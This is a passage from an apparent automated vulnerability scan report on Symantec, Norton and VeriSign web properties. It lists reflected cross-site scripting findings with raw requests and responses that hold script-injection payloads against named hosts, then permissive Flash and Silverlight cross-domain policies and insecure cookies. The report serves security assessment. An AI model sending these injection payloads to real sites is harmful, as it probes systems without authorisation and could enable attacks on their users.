rvice%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Fri, 09 Sep 2011 21:34:52 +0000
Vary: Cookie
ETag: "1315604092"
Content-Type: text/html; charset=utf-8
Content-Length: 29481
X-Varnish: 1369354548
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=1794
Date: Fri, 09 Sep 2011 21:34:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2/images/favicon.icobe710'-alert(1)-'6137fcbfa0a';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

3.34. http://www.symantec.com/s/searchg/suggest [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.symantec.com
Path:	/s/searchg/suggest

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 6b734<script>alert(1)</script>b1904ad5262 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /s/searchg/suggest?q=xss6b734<script>alert(1)</script>b1904ad5262&max=10&site=symc_en_US&client=symc_en_US&access=p&format=rich HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622023420-New%7C1336358023420%3B%20event69%3Devent69%7C1336358023421%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Content-Length: 73
Expires: Fri, 09 Sep 2011 21:33:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Sep 2011 21:33:43 GMT
Connection: close
Vary: Accept-Encoding

{ "query":"xss6b734<script>alert(1)</script>b1904ad5262", "results": [] }

3.35. https://cert.webtrust.org/ViewSeal [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://cert.webtrust.org
Path:	/ViewSeal

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 3e394<script>alert(1)</script>ae07fae4fa3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /ViewSeal?id=304 HTTP/1.1
Host: cert.webtrust.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=3e394<script>alert(1)</script>ae07fae4fa3

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 20:14:37 GMT
Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector)
X-Cache: MISS from cert.webtrust.org
Connection: close
Content-Type: text/html
Content-Length: 258

<html>
<head>
<title>Web Trust</title>
<link rel="stylesheet" href="/admin.css" type="text/css">
</head>
<body>
Invalid domain [http://www.google.com/search?hl=en&q=3e394<script>alert(1)</script>ae07fae4fa3]: please contact your practitioner.</body>
...[SNIP]...

4. Flash cross-domain policy previous next
There are 18 instances of this issue:

http://ak.c.ooyala.com/crossdomain.xml
http://cp76677.edgefcs.net/crossdomain.xml
http://mbox3.offermatica.com/crossdomain.xml
http://om.symantec.com/crossdomain.xml
http://player.ooyala.com/crossdomain.xml
https://symantec-corporation.com/crossdomain.xml
http://symantec.tt.omtrdc.net/crossdomain.xml
http://ch.norton.com/crossdomain.xml
http://l.player.ooyala.com/crossdomain.xml
http://us.norton.com/crossdomain.xml
https://us.norton.com/crossdomain.xml
https://www-secure.symantec.com/crossdomain.xml
http://www.symantec.com/crossdomain.xml
http://1168.ic-live.com/crossdomain.xml
https://drh.img.digitalriver.com/crossdomain.xml
http://twitter.com/crossdomain.xml
http://www.verisign.com/crossdomain.xml
https://www.verisign.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

4.1. http://ak.c.ooyala.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ak.c.ooyala.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ak.c.ooyala.com

Response

HTTP/1.0 200 OK
x-amz-id-2: KN3pSbRmPOnrtBbaZkJNn0JMK9l3niD957+u/ulcUqm9Ba/xmDtCsu4+ok1rK7GJ
x-amz-request-id: 46F7B2194FCF4B8A
Last-Modified: Mon, 12 Jan 2009 21:58:46 GMT
ETag: "124fa42a56284acbe74862f0024af4f3"
Content-Type: text/x-cross-domain-policy
Content-Length: 157
Server: AmazonS3
Cache-Control: max-age=604800
Date: Fri, 09 Sep 2011 21:26:10 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.2. http://cp76677.edgefcs.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cp76677.edgefcs.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: cp76677.edgefcs.net
Proxy-Connection: keep-alive
Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: Keep-Alive
Content-Length: 187
Server: FlashCom/3.5.6
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

4.3. http://mbox3.offermatica.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mbox3.offermatica.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: mbox3.offermatica.com

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Fri, 09 Sep 2011 21:24:35 GMT
Accept-Ranges: bytes
ETag: W/"201-1315435999000"
Connection: close
Last-Modified: Wed, 07 Sep 2011 22:53:19 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

4.4. http://om.symantec.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://om.symantec.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: om.symantec.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:11 GMT
Server: Omniture DC/2.0.0
xserver: www500
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.5. http://player.ooyala.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://player.ooyala.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: player.ooyala.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 06 Sep 2011 23:02:21 GMT
X-Ooyala-Server-Id: i-2a1c3f45
Content-Type: text/x-cross-domain-policy
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:26:10 GMT
Content-Length: 319
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.6. https://symantec-corporation.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://symantec-corporation.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: symantec-corporation.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:34:30 GMT
Server: Apache
Last-Modified: Wed, 19 May 2010 01:45:45 GMT
ETag: "4500fc-148-486e89dcf8440"
Accept-Ranges: bytes
Content-Length: 328
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<!--
Policy file for Responsys, Inc.

Last edit $Date: 2010-05-18 18:42:54
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

4.7. http://symantec.tt.omtrdc.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://symantec.tt.omtrdc.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: symantec.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Fri, 09 Sep 2011 21:30:59 GMT
Accept-Ranges: bytes
ETag: W/"201-1315435999000"
Connection: close
Last-Modified: Wed, 07 Sep 2011 22:53:19 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

4.8. http://ch.norton.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ch.norton.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ch.norton.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Length: 436
Last-Modified: Thu, 07 Oct 2010 22:54:56 GMT
ETag: "1b4-4cae4fc0"
Accept-Ranges: bytes
Content-Type: text/xml;charset=UTF-8
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:41:25 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.symantec.com"/>
<allow-access-from domain="*.norton.com"/>
<allow-access-from domain="*.symantecstore.com"/>
<allow-access-from domain="*.nortonopscenter.com"/>
<allow-access-from domain="*.brightcove.com"/>
...[SNIP]...

4.9. http://l.player.ooyala.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://l.player.ooyala.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.1
Host: l.player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Fri, 09 Sep 2011 21:26:09 GMT
Content-Type: text/x-cross-domain-policy
Connection: close
Cache-Control: max-age=3600, private
Content-Length: 330

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*.ooyala.com" />
...[SNIP]...

4.10. http://us.norton.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://us.norton.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: us.norton.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Length: 436
Last-Modified: Thu, 07 Oct 2010 22:54:56 GMT
ETag: "1b4-4cae4fc0"
Accept-Ranges: bytes
Content-Type: text/xml
Cache-Control: public, max-age=2748
Date: Fri, 09 Sep 2011 21:30:57 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.symantec.com"/>
<allow-access-from domain="*.norton.com"/>
<allow-access-from domain="*.symantecstore.com"/>
<allow-access-from domain="*.nortonopscenter.com"/>
<allow-access-from domain="*.brightcove.com"/>
...[SNIP]...

4.11. https://us.norton.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://us.norton.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: us.norton.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Length: 436
Last-Modified: Thu, 07 Oct 2010 22:54:56 GMT
ETag: "1b4-4cae4fc0"
Accept-Ranges: bytes
Content-Type: text/xml
Date: Fri, 09 Sep 2011 21:47:32 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.symantec.com"/>
<allow-access-from domain="*.norton.com"/>
<allow-access-from domain="*.symantecstore.com"/>
<allow-access-from domain="*.nortonopscenter.com"/>
<allow-access-from domain="*.brightcove.com"/>
...[SNIP]...

4.12. https://www-secure.symantec.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www-secure.symantec.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www-secure.symantec.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Tue, 17 Nov 2009 23:34:35 GMT
ETag: "22a-4b03330b"
Content-Type: text/xml
Date: Fri, 09 Sep 2011 21:47:32 GMT
Content-Length: 554
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.symantec.com"/>
<allow-access-from domain="*.norton.com"/>
<allow-access-from domain="*.symantecstore.com"/>
<allow-access-from domain="*.nortonopscenter.com"/>
<allow-access-from domain="*.securityprofessional.com"/>
<allow-access-from domain="*.securitydash.com"/>
<allow-access-from domain="*.brightcove.com"/>
...[SNIP]...

4.13. http://www.symantec.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.symantec.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.symantec.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Tue, 17 Nov 2009 23:34:35 GMT
ETag: "22a-4b03330b"
Content-Type: text/xml
Cache-Control: public, max-age=2498
Date: Fri, 09 Sep 2011 21:26:10 GMT
Content-Length: 554
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.symantec.com"/>
<allow-access-from domain="*.norton.com"/>
<allow-access-from domain="*.symantecstore.com"/>
<allow-access-from domain="*.nortonopscenter.com"/>
<allow-access-from domain="*.securityprofessional.com"/>
<allow-access-from domain="*.securitydash.com"/>
<allow-access-from domain="*.brightcove.com"/>
...[SNIP]...

4.14. http://1168.ic-live.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://1168.ic-live.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: 1168.ic-live.com

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
Last-Modified: Thu, 17 Mar 2011 17:54:57 GMT
ETag: "8045c-1c8-49eb15c03de40"
Accept-Ranges: bytes
Content-Length: 456
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="/w3c/p3p.xml"
Content-Type: text/xml
X-Cache: MISS from i2a-coll-20
X-Cache-Lookup: MISS from i2a-coll-20:80
Via: 1.0 i2a-coll-20:80 (squid/2.6.STABLE21)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="ecdev1.avery.com" secure="false" />
...[SNIP]...
<allow-access-from domain="ecdev1.averysignaturebinders.com" secure="false" />
...[SNIP]...
<allow-access-from domain="www.averysignaturebinders.com" secure="false" />
...[SNIP]...

4.15. https://drh.img.digitalriver.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://drh.img.digitalriver.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: drh.img.digitalriver.com

Response

HTTP/1.0 200 OK
ETag: "da-4ae73ece"
Content-Type: text/xml
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=66808035819,0)
Last-Modified: Tue, 27 Oct 2009 18:41:18 GMT
Content-Length: 218
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app72
Accept-Ranges: bytes
Date: Fri, 09 Sep 2011 21:41:50 GMT
Connection: close

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="gc.digitalriver.com" />
<allow-access-from domain="cx.digitalriver.com" />
</cr
...[SNIP]...

4.16. http://twitter.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 22:05:29 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 18:09:12 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Fri, 09 Sep 2011 22:35:29 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="api.twitter.com" />
<allow-access-from domain="search.twitter.com" />
<allow-access-from domain="static.twitter.com" />
...[SNIP]...

4.17. http://www.verisign.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.verisign.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:38 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 20:36:58 GMT
Accept-Ranges: bytes
Content-Length: 213
Expires: Sun, 09 Oct 2011 21:24:38 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="cdn.verisign.com"/>
</cross-d
...[SNIP]...

4.18. https://www.verisign.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.verisign.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.verisign.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:45 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 20:36:58 GMT
Accept-Ranges: bytes
Content-Length: 213
Expires: Sun, 09 Oct 2011 21:27:45 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="cdn.verisign.com"/>
</cross-d
...[SNIP]...

5. Silverlight cross-domain policy previous next
There are 2 instances of this issue:

http://om.symantec.com/clientaccesspolicy.xml
http://player.ooyala.com/clientaccesspolicy.xml

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

5.1. http://om.symantec.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://om.symantec.com
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: om.symantec.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:11 GMT
Server: Omniture DC/2.0.0
xserver: www627
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.2. http://player.ooyala.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://player.ooyala.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: player.ooyala.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 03 Aug 2011 01:50:51 GMT
X-Ooyala-Server-Id: i-78a24c19
Content-Type: text/xml
Date: Fri, 09 Sep 2011 21:26:10 GMT
Content-Length: 362
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-methods="*" http-request-headers="*">
<domain uri="*"/>
</allow-fr
...[SNIP]...

6. SSL cookie without secure flag set previous next
There are 67 instances of this issue:

https://admin.instantservice.com/Customer
https://admin.instantservice.com/links/5851/14753
https://admin.instantservice.com/links/5851/16144
https://admin.instantservice.com/links/5851/16145
https://admin.instantservice.com/links/5851/39897
https://onlinefamily.norton.com/familysafety/loginStart.fs
https://securitycenter.verisign.com/celp/enroll/outsideSearch
https://securitycenter.verisign.com/celp/enroll/retail
https://securitycenter.verisign.com/celp/enroll/upsell
https://onlinefamily.norton.com/familysafety/basicpremium.fs
https://renewals.symantec.com/renewals/application
https://ssl-certificate-center.verisign.ch/process/retail/console_login
https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial
https://ssl-certificate-center.verisign.com/process/retail/console_login
https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial
https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial
https://trust-center.verisign.ch/process/retail/console_login
https://trust-center.verisign.ch/process/retail/trust_initial
https://trust-center.verisign.com/favicon.ico
https://trust-center.verisign.com/process/retail/console_login
https://trust-center.verisign.com/process/retail/help_and_support
https://trust-center.verisign.com/process/retail/redirect
https://trust-center.verisign.com/process/retail/session_timeout
https://trust-center.verisign.com/process/retail/trust_initial
https://trust-center.verisign.com/process/retail/trust_product_selector
https://trust-center.verisign.com/process/retail/trust_product_selector.do
https://trust-center.verisign.com/rcm/TeaLeafTarget.html
https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif
https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif
https://trust-center.verisign.com/rcm/verisign/images/divider.gif
https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif
https://trust-center.verisign.com/rcm/verisign/images/logo.gif
https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif
https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif
https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif
https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif
https://trust-center.verisign.com/rcm/verisign/images/truste.gif
https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif
https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg
https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif
https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif
https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg
https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif
https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js
https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js
https://trust-center.verisign.com/rcm/verisign/scripts/default.js
https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js
https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js
https://trust-center.verisign.com/rcm/verisign/scripts/popup.js
https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js
https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js
https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js
https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js
